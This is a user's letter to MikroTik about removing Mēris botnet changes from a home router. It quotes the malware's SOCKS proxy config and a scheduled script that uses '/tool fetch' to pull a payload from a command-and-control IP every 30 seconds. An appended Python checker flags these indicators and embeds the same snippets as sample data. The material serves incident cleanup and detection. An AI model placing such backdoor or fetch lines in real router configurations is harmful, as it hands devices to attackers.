I recently helped my friend Ritvars clean up his MikroTik router (a hAP AC running the latest 6.48.4 stable). We would like to note that this router’s factory firmware was v6.44.6 and as such the router had never run a vulnerable RouterOS version.
So how did it become part of Mēris? Simple: my friend previously had an older MikroTik that had WinBox open to the entire world, and that older router got compromised at some point in the past. When he replaced this old router he also copied over the old config, including changes that Mēris had made. Oops! Something to check for in your own deployments.
About the indicators of compromise -- they were the same as mentioned above but let us add a bit more detail.
First: SOCKS proxy was enabled, running on a non-standard port. SOCKS uses TCP port 1080 by default and comes disabled. You would definitely know if you had it enabled as it is a very atypical config. Moreover, the SOCKS access list had a single entry with an IP range we did not recognize:
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!184.108.40.206/25
At this point the router’s CPU was pegged at 50% and we saw ~200 open SOCKS connections pushing whatever malicious traffic. As we disabled SOCKS proxy the CPU usage promptly dropped to 2%.
Second: router had a scheduled task executing an unknown script. Again, in its default config RouterOS has no scripts and no scheduled tasks defined. Ours looked as follows:
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=\
/system script
add dont-require-permissions=no name=script4_ owner=Ritvars policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
ddress=220.127.116.11 port=2008 src-path=/mikrotik.php mode=http keep-resu\
Notice that the IP belongs to the same C&C range mentioned above. So we deleted the script and deleted the scheduled task. We did not observe any L2TP changes: the L2TP config was blank, as is the default.
Please note that the same WinBox exploit which presumably was used to gain the initial compromise would also have allowed the attacker to recover all user passwords in plain text (including passwords for deleted users). See details at https://github.com/BigNerd95/WinboxExploit. Therefore you should rotate your passwords in RouterOS and everywhere else you have reused the same. I'd suggest you also make sure to restrict your router management access (e.g. ssh, WinBox) to a minimal subset of networks (ideally: networks you physically control, like your LAN). Don’t have them wide open to the entire internet.
Speaking of the latter point: keeping up-to-date IP lists is harder than it needs to be. For example, MikroTik script limits file access to 4 kilobytes, and while there is a workaround to load IP lists up to 63K, it leaves little room for growth if your IP lists have comments. Is there a better way coming in new RouterOS? :) Moreover, unless I want to manually upgrade RouterOS CA certificates, I have to run
as the latest stable RouterOS does not recognize LetsEncrypt. Could you make sure that RouterOS database is in sync with, say, Mozilla’s
? Here is how Debian maintains their copy: https://salsa.debian.org/debian/ca-certificates
Finally, thank you for all your hard work. We are very happy users of MikroTik and are very much looking forward to the new 7.x branch hitting stable. WireGuard, ZeroTier, rock solid hardware - what's not to love.
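As an added example (not from the post above and not MikroTik's own tooling): a small Python checker that re-joins the backslash-wrapped lines of a RouterOS /export and flags the items the post lists as Mēris indicators, namely SOCKS enabled (on a non-default port), SOCKS access entries, scheduler tasks, and scripts that /tool fetch from some address. The sample export is constructed from the snippets in the post; the section paths are standard RouterOS export headers.

```python
import re

# Constructed sample in the shape of the "/export" snippets quoted in the post
# (same IPs as the post; not a real capture).
SAMPLE_EXPORT = r"""/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!184.108.40.206/25
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=reboot,read,write
/system script
add dont-require-permissions=no name=script4_ owner=Ritvars policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=220.127.116.11 port=2008 src-path=/mikrotik.php mode=http"
"""


def logical_lines(export_text):
    """Re-join RouterOS export lines that were wrapped with a trailing backslash."""
    out, buf = [], ""
    for raw in export_text.splitlines():
        buf += raw.strip()
        if buf.endswith("\\"):
            buf = buf[:-1]          # wrapped: keep accumulating
            continue
        if buf:
            out.append(buf)
        buf = ""
    return out


def find_indicators(export_text):
    """Flag config items matching the post's indicators; returns (section, note) pairs."""
    findings, section = [], None
    for line in logical_lines(export_text):
        if line.startswith("/"):
            section = line              # e.g. "/ip socks access"
            continue
        if section == "/ip socks" and "enabled=yes" in line:
            m = re.search(r"\bport=(\d+)", line)
            port = int(m.group(1)) if m else 1080   # RouterOS default is 1080
            findings.append((section, f"SOCKS proxy enabled on port {port}{' (non-default)' if port != 1080 else ''}"))
        elif section == "/ip socks access" and line.startswith("add "):
            findings.append((section, "access entry: " + line[4:]))
        elif section == "/system scheduler" and line.startswith("add "):
            m = re.search(r"\bon-event=(\S+)", line)
            findings.append((section, "task runs script " + (m.group(1) if m else "?")))
        elif section == "/system script" and line.startswith("add "):
            m = re.search(r"/tool fetch .*?\baddress=([\d.]+)", line)
            findings.append((section, "script fetches from " + m.group(1) if m else "script defined: review its source"))
    return findings
```

Run it against the output of `/export` saved from the router; an empty result on a stock config is the expected baseline, and anything listed deserves a look.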